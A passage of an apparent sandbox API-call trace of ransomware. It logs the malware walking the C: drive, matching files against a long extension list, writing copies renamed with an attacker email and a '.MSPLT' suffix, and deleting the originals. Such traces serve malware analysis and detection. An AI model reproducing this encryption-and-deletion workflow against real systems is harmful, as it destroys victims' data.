Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 68 [0320.554] lstrlenW (lpString=".1cd") returned 4 [0320.554] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 68 [0320.555] lstrlenW (lpString=".jpg") returned 4 [0320.555] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 68 [0320.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 68 [0320.555] lstrlenW (lpString=".doc") returned 4 [0320.555] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.555] lstrlenW (lpString=".docx") returned 5 [0320.555] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.555] lstrlenW (lpString=".pdf") returned 4 [0320.555] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.555] lstrlenW (lpString=".xls") returned 4 [0320.555] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.555] lstrlenW (lpString=".xlsx") returned 5 [0320.555] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.555] lstrlenW (lpString=".ppt") returned 4 [0320.555] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 68 [0320.556] lstrlenW (lpString=".zip") returned 4 [0320.556] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.556] lstrlenW (lpString=".rar") returned 4 [0320.556] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.556] lstrlenW (lpString=".bz2") returned 4 [0320.556] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.556] lstrlenW (lpString=".7z") returned 3 [0320.556] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 68 [0320.556] lstrlenW (lpString=".dbf") returned 4 [0320.556] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 68 [0320.556] lstrlenW (lpString=".1cd") returned 4 [0320.556] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 68 [0320.556] lstrlenW (lpString=".jpg") returned 4 [0320.556] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.557] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0320.557] lstrlenW (lpString="DD01146_.WMF") returned 12 [0320.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01146_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0320.558] GetFileSizeEx (in: hFile=0x53c, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=2796) returned 1 [0320.559] CloseHandle (hObject=0x53c) returned 1 [0320.559] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01146_.wmf")) returned 0x220 [0320.559] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01146_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0320.559] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0320.560] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.560] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01146_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0320.561] GetLastError () returned 0x0 [0320.561] ReadFile (in: hFile=0x53c, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0xaec, lpOverlapped=0x0) returned 1 [0320.564] WriteFile (in: hFile=0x52c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xaf0, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xaf0, lpOverlapped=0x0) returned 1 [0320.567] ReadFile (in: hFile=0x53c, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.567] WriteFile (in: hFile=0x52c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.567] SetEndOfFile (hFile=0x52c) returned 1 [0320.567] CloseHandle (hObject=0x52c) returned 1 [0320.567] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.567] SetEndOfFile (hFile=0x53c) returned 1 [0320.571] CloseHandle (hObject=0x53c) returned 1 [0320.572] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.572] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01146_.wmf")) returned 1 [0320.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 68 [0320.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 68 [0320.573] lstrlenW (lpString=".doc") returned 4 [0320.573] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.573] lstrlenW (lpString=".docx") returned 5 [0320.573] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.574] lstrlenW (lpString=".pdf") returned 4 [0320.574] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.574] lstrlenW (lpString=".xls") returned 4 [0320.574] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.574] lstrlenW (lpString=".xlsx") returned 5 [0320.574] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.574] lstrlenW (lpString=".ppt") returned 4 [0320.574] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 68 [0320.574] lstrlenW (lpString=".zip") returned 4 [0320.574] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.574] lstrlenW (lpString=".rar") returned 4 [0320.574] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.574] lstrlenW (lpString=".bz2") returned 4 [0320.574] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.574] lstrlenW (lpString=".7z") returned 3 [0320.574] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 68 [0320.574] lstrlenW (lpString=".dbf") returned 4 [0320.574] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 68 [0320.574] lstrlenW (lpString=".1cd") returned 4 [0320.574] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 68 [0320.574] lstrlenW (lpString=".jpg") returned 4 [0320.574] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 68 [0320.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 68 [0320.575] lstrlenW (lpString=".doc") returned 4 [0320.575] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.575] lstrlenW (lpString=".docx") returned 5 [0320.575] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.575] lstrlenW (lpString=".pdf") returned 4 [0320.575] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.575] lstrlenW (lpString=".xls") returned 4 [0320.575] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.575] lstrlenW (lpString=".xlsx") returned 5 [0320.575] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.575] lstrlenW (lpString=".ppt") returned 4 [0320.575] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 68 [0320.575] lstrlenW (lpString=".zip") returned 4 [0320.575] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.575] lstrlenW (lpString=".rar") returned 4 [0320.575] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.575] lstrlenW (lpString=".bz2") returned 4 [0320.575] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.575] lstrlenW (lpString=".7z") returned 3 [0320.575] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 68 [0320.576] lstrlenW (lpString=".dbf") returned 4 [0320.576] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 68 [0320.576] lstrlenW (lpString=".1cd") returned 4 [0320.576] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 68 [0320.576] lstrlenW (lpString=".jpg") returned 4 [0320.576] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.576] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0320.576] lstrlenW (lpString="DD01151_.WMF") returned 12 [0320.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01151_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0320.577] GetFileSizeEx (in: hFile=0x53c, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=2960) returned 1 [0320.577] CloseHandle (hObject=0x53c) returned 1 [0320.577] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01151_.wmf")) returned 0x220 [0320.577] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01151_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0320.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01151_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0320.578] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.578] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01151_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0320.579] GetLastError () returned 0x0 [0320.580] ReadFile (in: hFile=0x53c, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0xb90, lpOverlapped=0x0) returned 1 [0320.676] WriteFile (in: hFile=0x52c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xba0, lpOverlapped=0x0) returned 1 [0320.678] ReadFile (in: hFile=0x53c, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.678] WriteFile (in: hFile=0x52c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.679] SetEndOfFile (hFile=0x52c) returned 1 [0320.751] CloseHandle (hObject=0x52c) returned 1 [0320.751] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.751] SetEndOfFile (hFile=0x53c) returned 1 [0320.774] CloseHandle (hObject=0x53c) returned 1 [0320.774] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) Thread: id = 42 os_tid = 0xe04 [0280.435] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x53cee0 [0280.436] lstrlenW (lpString="C:") returned 2 [0280.436] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x2e8fcf8 | out: lpFindFileData=0x2e8fcf8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77b20000, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0x48a830 [0280.436] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0280.436] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent") returned 1 [0280.436] lstrlenW (lpString="$GetCurrent") returned 11 [0280.436] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="$GetCurrent") returned 1 [0280.436] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0280.437] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0280.437] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\*", lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x48a8b0 [0280.464] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0280.464] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x58e47bf6, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e47bf6, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Logs", cAlternateFileName="")) returned 1 [0280.464] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0280.464] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent\\Logs") returned 1 [0280.464] lstrlenW (lpString="Logs") returned 4 [0280.464] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="Logs") returned -1 [0280.464] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x3880058 [0280.465] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0280.465] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x58e47bf6, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e47bf6, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe3c4, dwReserved1=0x2e8, cFileName=".", cAlternateFileName="")) returned 0x48a130 [0282.923] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x58e47bf6, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e47bf6, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe3c4, dwReserved1=0x2e8, cFileName="..", cAlternateFileName="")) returned 1 [0282.924] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58b2690b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x58b2690b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58b4cce4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xa7de, dwReserved0=0xffffe3c4, dwReserved1=0x2e8, cFileName="downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="DOWNLE~1.MSP")) returned 1 [0282.924] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[supermetasploit@aol.com].MSPLT") returned 81 [0282.924] lstrlenW (lpString=".1cd") returned 4 [0282.924] lstrcmpiW (lpString1=".1cd", lpString2="SPLT") returned -1 [0282.924] lstrlenW (lpString=".3ds") returned 4 [0282.924] lstrcmpiW (lpString1=".3ds", lpString2="SPLT") returned -1 [0282.924] lstrlenW (lpString=".3fr") returned 4 [0282.924] lstrcmpiW (lpString1=".3fr", lpString2="SPLT") returned -1 [0282.924] lstrlenW (lpString=".3g2") returned 4 [0282.924] lstrcmpiW (lpString1=".3g2", lpString2="SPLT") returned -1 [0282.924] lstrlenW (lpString=".3gp") returned 4 [0282.924] lstrcmpiW (lpString1=".3gp", lpString2="SPLT") returned -1 [0282.924] lstrlenW (lpString=".7z") returned 3 [0282.924] lstrcmpiW (lpString1=".7z", lpString2="PLT") returned -1 [0282.924] lstrlenW (lpString=".accda") returned 6 [0282.924] lstrcmpiW (lpString1=".accda", lpString2=".MSPLT") returned -1 [0282.924] lstrlenW (lpString=".accdb") returned 6 [0282.924] lstrcmpiW (lpString1=".accdb", lpString2=".MSPLT") returned -1 [0282.924] lstrlenW (lpString=".accdc") returned 6 [0282.924] lstrcmpiW (lpString1=".accdc", lpString2=".MSPLT") returned -1 [0282.924] lstrlenW (lpString=".accde") returned 6 [0282.924] lstrcmpiW (lpString1=".accde", lpString2=".MSPLT") returned -1 [0282.924] lstrlenW (lpString=".accdt") returned 6 [0282.925] lstrcmpiW (lpString1=".accdt", lpString2=".MSPLT") returned -1 [0282.925] lstrlenW (lpString=".accdw") returned 6 [0282.925] lstrcmpiW (lpString1=".accdw", lpString2=".MSPLT") returned -1 [0282.925] lstrlenW (lpString=".adb") returned 4 [0282.925] lstrcmpiW (lpString1=".adb", lpString2="SPLT") returned -1 [0282.925] lstrlenW (lpString=".adp") returned 4 [0282.925] lstrcmpiW (lpString1=".adp", lpString2="SPLT") returned -1 [0282.925] lstrlenW (lpString=".ai") returned 3 [0282.925] lstrcmpiW (lpString1=".ai", lpString2="PLT") returned -1 [0282.925] lstrlenW (lpString=".ai3") returned 4 [0282.925] lstrcmpiW (lpString1=".ai3", lpString2="SPLT") returned -1 [0282.925] lstrlenW (lpString=".ai4") returned 4 [0282.925] lstrcmpiW (lpString1=".ai4", lpString2="SPLT") returned -1 [0282.925] lstrlenW (lpString=".ai5") returned 4 [0282.925] lstrcmpiW (lpString1=".ai5", lpString2="SPLT") returned -1 [0282.925] lstrlenW (lpString=".ai6") returned 4 [0282.925] lstrcmpiW (lpString1=".ai6", lpString2="SPLT") returned -1 [0282.925] lstrlenW (lpString=".ai7") returned 4 [0282.925] lstrcmpiW (lpString1=".ai7", lpString2="SPLT") returned -1 [0282.925] lstrlenW (lpString=".ai8") returned 4 [0282.925] lstrcmpiW (lpString1=".ai8", lpString2="SPLT") returned -1 [0282.925] lstrlenW (lpString=".anim") returned 5 [0282.925] lstrcmpiW (lpString1=".anim", lpString2="MSPLT") returned -1 [0282.925] lstrlenW (lpString=".arw") returned 4 [0282.925] lstrcmpiW (lpString1=".arw", lpString2="SPLT") returned -1 [0282.925] lstrlenW (lpString=".as") returned 3 [0282.925] lstrcmpiW (lpString1=".as", lpString2="PLT") returned -1 [0282.925] lstrlenW (lpString=".asa") returned 4 [0282.925] lstrcmpiW (lpString1=".asa", lpString2="SPLT") returned -1 [0282.925] lstrlenW (lpString=".asc") returned 4 [0282.925] lstrcmpiW (lpString1=".asc", lpString2="SPLT") returned -1 [0282.925] lstrlenW (lpString=".ascx") returned 5 [0282.926] lstrcmpiW (lpString1=".ascx", lpString2="MSPLT") returned -1 [0282.926] lstrlenW (lpString=".asm") returned 4 [0282.926] lstrcmpiW (lpString1=".asm", lpString2="SPLT") returned -1 [0282.926] lstrlenW (lpString=".asmx") returned 5 [0282.926] lstrcmpiW (lpString1=".asmx", lpString2="MSPLT") returned -1 [0282.926] lstrlenW (lpString=".asp") returned 4 [0282.926] lstrcmpiW (lpString1=".asp", lpString2="SPLT") returned -1 [0282.926] lstrlenW (lpString=".aspx") returned 5 [0282.926] lstrcmpiW (lpString1=".aspx", lpString2="MSPLT") returned -1 [0282.926] lstrlenW (lpString=".asr") returned 4 [0282.926] lstrcmpiW (lpString1=".asr", lpString2="SPLT") returned -1 [0282.926] lstrlenW (lpString=".asx") returned 4 [0282.926] lstrcmpiW (lpString1=".asx", lpString2="SPLT") returned -1 [0282.926] lstrlenW (lpString=".avi") returned 4 [0282.926] lstrcmpiW (lpString1=".avi", lpString2="SPLT") returned -1 [0282.926] lstrlenW (lpString=".avs") returned 4 [0282.926] lstrcmpiW (lpString1=".avs", lpString2="SPLT") returned -1 [0282.926] lstrlenW (lpString=".backup") returned 7 [0282.926] lstrcmpiW (lpString1=".backup", lpString2="].MSPLT") returned -1 [0282.926] lstrlenW (lpString=".bak") returned 4 [0282.926] lstrcmpiW (lpString1=".bak", lpString2="SPLT") returned -1 [0282.926] lstrlenW (lpString=".bay") returned 4 [0282.926] lstrcmpiW (lpString1=".bay", lpString2="SPLT") returned -1 [0282.926] lstrlenW (lpString=".bd") returned 3 [0282.926] lstrcmpiW (lpString1=".bd", lpString2="PLT") returned -1 [0282.926] lstrlenW (lpString=".bin") returned 4 [0282.926] lstrcmpiW (lpString1=".bin", lpString2="SPLT") returned -1 [0282.926] lstrlenW (lpString=".bmp") returned 4 [0282.926] lstrcmpiW (lpString1=".bmp", lpString2="SPLT") returned -1 [0282.926] lstrlenW (lpString=".bz2") returned 4 [0282.926] lstrcmpiW (lpString1=".bz2", lpString2="SPLT") returned -1 [0282.926] lstrlenW (lpString=".c") returned 2 [0282.926] lstrcmpiW (lpString1=".c", lpString2="LT") returned -1 [0282.926] lstrlenW (lpString=".cdr") returned 4 [0282.926] lstrcmpiW (lpString1=".cdr", lpString2="SPLT") returned -1 [0282.926] lstrlenW (lpString=".cer") returned 4 [0282.927] lstrcmpiW (lpString1=".cer", lpString2="SPLT") returned -1 [0282.927] lstrlenW (lpString=".cf") returned 3 [0282.927] lstrcmpiW (lpString1=".cf", lpString2="PLT") returned -1 [0282.927] lstrlenW (lpString=".cfc") returned 4 [0282.927] lstrcmpiW (lpString1=".cfc", lpString2="SPLT") returned -1 [0282.927] lstrlenW (lpString=".cfm") returned 4 [0282.927] lstrcmpiW (lpString1=".cfm", lpString2="SPLT") returned -1 [0282.927] lstrlenW (lpString=".cfml") returned 5 [0282.927] lstrcmpiW (lpString1=".cfml", lpString2="MSPLT") returned -1 [0282.927] 